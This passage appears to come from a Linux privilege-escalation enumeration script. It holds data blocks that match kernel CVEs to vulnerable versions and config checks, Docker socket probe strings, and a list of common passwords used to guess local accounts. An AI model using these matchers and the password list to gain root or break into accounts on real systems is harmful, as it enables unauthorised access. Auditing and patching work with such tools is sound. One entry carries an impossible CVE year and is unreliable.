suggesters 1633 CVE-2023-32882 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1634 CVE-2023-33063 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1635 CVE-2023-33106 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1636 CVE-2023-33107 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1637 CVE-2023-3338 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1638 EOF_DATA_16 1639 )" 1640 KERNEL_CVE_DATA_17="$(cat <<'EOF_DATA_17' 1641 CVE-2023-3389 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1642 CVE-2023-3390 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1643 CVE-2023-35001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1644 CVE-2023-3865 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1645 CVE-2023-3866 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1646 CVE-2023-4130 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1647 CVE-2023-4211 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1648 CVE-2023-42483 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1649 CVE-2023-4273 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1650 CVE-2023-45864 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1651 CVE-2023-4611 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1652 CVE-2023-48409 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1653 CVE-2023-50809 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1654 CVE-2023-5178 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1655 CVE-2023-52440 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1656 CVE-2023-52447 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1657 CVE-2023-52922 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1658 CVE-2023-52926 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1659 CVE-2023-5717 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1660 CVE-2023-6200 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1661 CVE-2023-6241 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1662 CVE-2023-6546 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1663 CVE-2023-6931 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1664 CVE-2023-6932 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1665 CVE-2024-0582 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1666 EOF_DATA_17 1667 )" 1668 KERNEL_CVE_DATA_18="$(cat <<'EOF_DATA_18' 1669 CVE-2024-20018 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1670 CVE-2024-21455 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1671 CVE-2024-23372 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1672 CVE-2024-23373 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1673 CVE-2024-23380 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1674 CVE-2024-26809 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1675 CVE-2024-26921 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1676 CVE-2024-26925 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1677 CVE-2024-26926 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1678 CVE-2024-31333 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1679 CVE-2024-33060 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1680 CVE-2024-35880 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1681 CVE-2024-36016 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1682 CVE-2024-36886 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1683 CVE-2024-36904 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1684 CVE-2024-36974 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1685 CVE-2024-36978 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1686 CVE-2024-38399 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1687 CVE-2024-38402 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1688 CVE-2024-41003 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1689 CVE-2024-41009 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1690 CVE-2024-41010 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1691 CVE-2024-43047 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1692 CVE-2024-43882 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1693 CVE-2024-44068 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1694 EOF_DATA_18 1695 )" 1696 KERNEL_CVE_DATA_19="$(cat <<'EOF_DATA_19' 1697 CVE-2024-46713 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1698 CVE-2024-46740 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1699 CVE-2024-49739 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1700 CVE-2024-49848 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1701 CVE-2024-49882 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1702 CVE-2024-50066 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1703 CVE-2024-50264 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1704 CVE-2024-50302 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1705 CVE-2024-53104 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1706 CVE-2024-53141 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1707 CVE-2024-53197 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1708 CVE-2024-56614 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1709 CVE-2024-56615 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1710 CVE-2024-56626 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1711 CVE-2024-56627 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1712 CVE-2024-56770 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1713 CVE-2025-0072 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1714 CVE-2025-0927 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1715 CVE-2025-21479 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1716 CVE-2025-21666 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1717 CVE-2025-21669 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1718 CVE-2025-21670 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1719 CVE-2025-21692 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1720 CVE-2025-21700 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1721 CVE-2025-21703 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1722 EOF_DATA_19 1723 )" 1724 KERNEL_CVE_DATA_20="$(cat <<'EOF_DATA_20' 1725 CVE-2025-21756 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1726 CVE-2025-21836 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1727 CVE-2025-22056 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1728 CVE-2025-23280 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1729 CVE-2025-23330 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1730 CVE-2025-32463 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1731 CVE-2025-37752 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1732 CVE-2025-37756 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1733 CVE-2025-37899 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1734 CVE-2025-37947 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1735 CVE-2025-38001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1736 CVE-2025-38003 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1737 CVE-2025-38004 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1738 CVE-2025-38617 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1739 CVE-2025-39946 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1740 CVE-2025-39965 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1741 CVE-2025-40040 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1742 CVE-2025-6349 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1743 CVE-2025-8045 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1744 CVE-2025-8109 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1745 CVE-2025-38236 AF_UNIX MSG_OOB UAF pkg=linux-kernel,ver>=5.15,ver<6.1.143 1 Fixed in stable 6.1.143 1746 CVE-2025-38236 AF_UNIX MSG_OOB UAF pkg=linux-kernel,ver>=6.2,ver<6.6.96 1 Fixed in stable 6.6.96 1747 CVE-2025-38236 AF_UNIX MSG_OOB UAF pkg=linux-kernel,ver>=6.7,ver<6.12.36 1 Fixed in stable 6.12.36 1748 CVE-2025-38236 AF_UNIX MSG_OOB UAF pkg=linux-kernel,ver>=6.13,ver<6.15.5 1 Fixed in stable 6.15.5 1749 CVE-2106-2504 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1750 EOF_DATA_20 1751 )" 1752 KERNEL_CVE_DATA_21="$(cat <<'EOF_DATA_21' 1753 CVE-2015-8550 double-fetch pkg=linux-kernel,ver=4.19.65 1 From kernel-exploit-factory detail section (test version Linux-4.19.65) 1754 CVE-2017-8890 inet_csk_clone_lock double-free pkg=linux-kernel,ver=4.10.15 1 From kernel-exploit-factory detail section (test version Linux-4.10.15) 1755 CVE-2019-8956 sctp_sendmsg null pointer dereference pkg=linux-kernel,ver=4.20.0,x86 1 From kernel-exploit-factory detail section; exploit chain is documented for 32-bit with CVE-2019-9213 1756 CVE-2021-31440 eBPF verifier __reg_combine_64_into_32 pkg=linux-kernel,ver>=5.11,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 1 From kernel-exploit-factory detail section and exploit prerequisites 1757 CVE-2021-4154 cgroup fsconfig type confusion pkg=linux-kernel,ver=5.13.3 1 From kernel-exploit-factory detail section (test version Linux-5.13.3) 1758 CVE-2022-2588 route4_filter double-free pkg=linux-kernel,ver=5.19.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 1 From kernel-exploit-factory detail section and exploit prerequisites 1759 CVE-2022-2639 openvswitch reserve_sfa_size integer overflow pkg=linux-kernel,ver=5.17.4,cmd:grep -qi openvswitch /proc/modules 1 From kernel-exploit-factory detail section; openvswitch module required 1760 CVE-2025-21702 net/sched qdisc UAF pkg=linux-kernel,ver=6.6.75,CONFIG_NET_SCHED=y 1 From kernel-exploit-factory detail section (test version Linux-6.6.75) 1761 CVE-2025-38236 AF_UNIX MSG_OOB UAF pkg=linux-kernel,ver>=6.16,ver<6.17,cmd:uname -r 2>/dev/null | grep -Eq '^6\.16\.0-rc[123]([-.]|$)' 1 Fixed in mainline 6.16-rc4 1762 CVE-2026-31431 Copy Fail pkg=linux-kernel,ver>=4.14,ver<5.10.254,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my] 1 Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0 1763 CVE-2026-31431 Copy Fail pkg=linux-kernel,ver>=5.11,ver<5.15.204,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my] 1 Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0 1764 CVE-2026-31431 Copy Fail pkg=linux-kernel,ver>=5.16,ver<6.1.170,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my] 1 Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0 1765 CVE-2026-31431 Copy Fail pkg=linux-kernel,ver>=6.2,ver<6.6.137,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my] 1 Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0 1766 CVE-2026-31431 Copy Fail pkg=linux-kernel,ver>=6.7,ver<6.12.85,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my] 1 Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0 1767 CVE-2026-31431 Copy Fail pkg=linux-kernel,ver>=6.13,ver<6.18.22,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my] 1 Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0 1768 CVE-2026-31431 Copy Fail pkg=linux-kernel,ver>=6.19,ver<6.19.12,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my] 1 Upstream issue fixed in 6.19.12 and mainline 7.0 1769 CVE-2026-43503 DirtyClone pkg=linux-kernel,ver>=3.9,ver<5.10.257 1 Fixed in stable 5.10.257; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules 1770 CVE-2017-16994 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; appears as related bypass mention 1771 CVE-2020-27171 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; appears as related comment in exploit source 1772 CVE-2024-0193 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; appears as upstream source reference 1773 CVE-2026-43284 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from official Ubuntu/Red Hat Dirty Frag advisories; no stable matcher added 1774 CVE-2026-43494 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from official Ubuntu PinTheft advisory; no stable matcher added 1775 CVE-2026-43500 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from official Ubuntu/Red Hat Dirty Frag advisories; no stable matcher added 1776 CVE-2026-46243 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from official Red Hat CIFSwitch advisory; no stable matcher added 1777 CVE-2026-46300 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from official Ubuntu/Red Hat Fragnesia advisories; no stable matcher added 1778 EOF_DATA_21 1779 )" 1780 KERNEL_CVE_DATA_22="$(cat <<'EOF_DATA_22' 1781 CVE-2026-43503 DirtyClone pkg=linux-kernel,ver>=5.11,ver<5.15.208 1 Fixed in stable 5.15.208; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules 1782 CVE-2026-43503 DirtyClone pkg=linux-kernel,ver>=5.16,ver<6.1.174 1 Fixed in stable 6.1.174; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules 1783 CVE-2026-43503 DirtyClone pkg=linux-kernel,ver>=6.2,ver<6.6.141 1 Fixed in stable 6.6.141; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules 1784 CVE-2026-43503 DirtyClone pkg=linux-kernel,ver>=6.7,ver<6.12.91 1 Fixed in stable 6.12.91; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules 1785 CVE-2026-43503 DirtyClone pkg=linux-kernel,ver>=6.13,ver<6.18.33 1 Fixed in stable 6.18.33; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules 1786 CVE-2026-43503 DirtyClone pkg=linux-kernel,ver>=6.19,ver<7.0.10 1 Fixed in stable 7.0.10 and mainline 7.1 1787 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=4.19.244,ver<4.20 1 Fixed before 4.20 in later backports; exploit path uses the traffic-control act_pedit subsystem 1788 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=5.4.195,ver<5.5 1 Fixed before 5.5 in later backports; exploit path uses the traffic-control act_pedit subsystem 1789 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=5.10.117,ver<5.11 1 Fixed before 5.11 in later backports; exploit path uses the traffic-control act_pedit subsystem 1790 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=5.15.41,ver<5.16 1 Fixed before 5.16 in later backports; exploit path uses the traffic-control act_pedit subsystem 1791 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=5.17.9,ver<5.18 1 Fixed before 5.18 in later backports; exploit path uses the traffic-control act_pedit subsystem 1792 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=5.18,ver<6.12.94 1 Fixed in stable 6.12.94; exploit path uses the traffic-control act_pedit subsystem 1793 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=6.13,ver<6.18.36 1 Fixed in stable 6.18.36; exploit path uses the traffic-control act_pedit subsystem 1794 CVE-2026-46331 pedit COW pkg=linux-kernel,ver>=6.19,ver<7.0.13 1 Fixed in stable 7.0.13 and mainline 7.1 1795 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=3.16.52,ver<3.17,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue backported into 3.16 at 3.16.52; mitigated by kernel.yama.ptrace_scope >= 2 1796 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=4.4.40,ver<4.5,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue backported into 4.4 at 4.4.40; mitigated by kernel.yama.ptrace_scope >= 2 1797 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=4.8.16,ver<4.9,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue backported into 4.8 at 4.8.16; mitigated by kernel.yama.ptrace_scope >= 2 1798 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=4.9.1,ver<4.10,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue backported into 4.9 at 4.9.1; mitigated by kernel.yama.ptrace_scope >= 2 1799 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=4.10,ver<5.10.256,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue introduced in 4.10; fixed in 5.10.256; mitigated by kernel.yama.ptrace_scope >= 2 1800 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=5.11,ver<5.15.207,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue introduced in 4.10; fixed in 5.15.207; mitigated by kernel.yama.ptrace_scope >= 2 1801 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=5.16,ver<6.1.173,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue introduced in 4.10; fixed in 6.1.173; mitigated by kernel.yama.ptrace_scope >= 2 1802 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=6.2,ver<6.6.139,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue introduced in 4.10; fixed in 6.6.139; mitigated by kernel.yama.ptrace_scope >= 2 1803 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=6.7,ver<6.12.89,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue introduced in 4.10; fixed in 6.12.89; mitigated by kernel.yama.ptrace_scope >= 2 1804 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=6.13,ver<6.18.31,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue introduced in 4.10; fixed in 6.18.31; mitigated by kernel.yama.ptrace_scope >= 2 1805 CVE-2026-46333 ptrace exit-race pkg=linux-kernel,ver>=6.19,ver<7.0.8,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ] 1 Upstream issue introduced in 4.10; fixed in 7.0.8; mitigated by kernel.yama.ptrace_scope >= 2 1806 EOF_DATA_22 1807 )" 1808 KERNEL_CVE_DATA_23="$(cat <<'EOF_DATA_23' 1809 CVE-2026-43499 GhostLock rtmutex UAF pkg=linux-kernel,ver>=2.6.39,ver<5.10.261,CONFIG_FUTEX_PI=y 1 Fixed in stable 5.10.261; priority-inheritance futexes must be enabled 1810 CVE-2026-43499 GhostLock rtmutex UAF pkg=linux-kernel,ver>=5.11,ver<5.15.212,CONFIG_FUTEX_PI=y 1 Fixed in stable 5.15.212; priority-inheritance futexes must be enabled 1811 CVE-2026-43499 GhostLock rtmutex UAF pkg=linux-kernel,ver>=5.16,ver<6.1.175,CONFIG_FUTEX_PI=y 1 Fixed in stable 6.1.175; priority-inheritance futexes must be enabled 1812 CVE-2026-43499 GhostLock rtmutex UAF pkg=linux-kernel,ver>=6.2,ver<6.6.140,CONFIG_FUTEX_PI=y 1 Fixed in stable 6.6.140; priority-inheritance futexes must be enabled 1813 CVE-2026-43499 GhostLock rtmutex UAF pkg=linux-kernel,ver>=6.7,ver<6.12.86,CONFIG_FUTEX_PI=y 1 Fixed in stable 6.12.86; priority-inheritance futexes must be enabled 1814 CVE-2026-43499 GhostLock rtmutex UAF pkg=linux-kernel,ver>=6.13,ver<6.18.27,CONFIG_FUTEX_PI=y 1 Fixed in stable 6.18.27; priority-inheritance futexes must be enabled 1815 CVE-2026-43499 GhostLock rtmutex UAF pkg=linux-kernel,ver>=6.19,ver<7.0.4,CONFIG_FUTEX_PI=y 1 Fixed in stable 7.0.4 and mainline 7.1; priority-inheritance futexes must be enabled 1816 CVE-2026-53362 IPv6 fraggap out-of-bounds write pkg=linux-kernel,ver>=6.0,ver<6.1.177,CONFIG_IPV6=[my] 1 Fixed in stable 6.1.177; IPv6 must be enabled 1817 CVE-2026-53362 IPv6 fraggap out-of-bounds write pkg=linux-kernel,ver>=6.2,ver<6.6.144,CONFIG_IPV6=[my] 1 Fixed in stable 6.6.144; IPv6 must be enabled 1818 CVE-2026-53362 IPv6 fraggap out-of-bounds write pkg=linux-kernel,ver>=6.7,ver<6.12.95,CONFIG_IPV6=[my] 1 Fixed in stable 6.12.95; IPv6 must be enabled 1819 CVE-2026-53362 IPv6 fraggap out-of-bounds write pkg=linux-kernel,ver>=6.13,ver<6.18.38,CONFIG_IPV6=[my] 1 Fixed in stable 6.18.38; IPv6 must be enabled 1820 CVE-2026-53362 IPv6 fraggap out-of-bounds write pkg=linux-kernel,ver>=6.19,ver<7.1.3,CONFIG_IPV6=[my] 1 Fixed in stable 7.1.3 and mainline 7.2-rc1; IPv6 must be enabled 1821 CVE-2026-64600 RefluXFS stale mapping race pkg=linux-kernel,ver>=4.11,ver<5.15.212,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts 1 Fixed in stable 5.15.212; requires an XFS filesystem with reflink enabled 1822 CVE-2026-64600 RefluXFS stale mapping race pkg=linux-kernel,ver>=5.16,ver<6.1.178,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts 1 Fixed in stable 6.1.178; requires an XFS filesystem with reflink enabled 1823 CVE-2026-64600 RefluXFS stale mapping race pkg=linux-kernel,ver>=6.2,ver<6.6.145,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts 1 Fixed in stable 6.6.145; requires an XFS filesystem with reflink enabled 1824 CVE-2026-64600 RefluXFS stale mapping race pkg=linux-kernel,ver>=6.7,ver<6.12.96,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts 1 Fixed in stable 6.12.96; requires an XFS filesystem with reflink enabled 1825 CVE-2026-64600 RefluXFS stale mapping race pkg=linux-kernel,ver>=6.13,ver<6.18.39,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts 1 Fixed in stable 6.18.39; requires an XFS filesystem with reflink enabled 1826 CVE-2026-64600 RefluXFS stale mapping race pkg=linux-kernel,ver>=6.19,ver<7.1.4,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts 1 Fixed in stable 7.1.4; requires an XFS filesystem with reflink enabled 1827 CVE-2026-64600 RefluXFS stale mapping race pkg=linux-kernel,ver>=7.2,ver<7.3,CONFIG_XFS_FS=[my],cmd:uname -r 2>/dev/null | grep -Eq '^7\.2\.0-rc[123]([-.]|$)',cmd:grep -qw xfs /proc/mounts 1 Fixed in mainline 7.2-rc4; requires an XFS filesystem with reflink enabled 1828 EOF_DATA_23 1829 )" 1830 1831 TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." 1832 1833 GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" 1834 1835 GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" 1836 1837 top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer 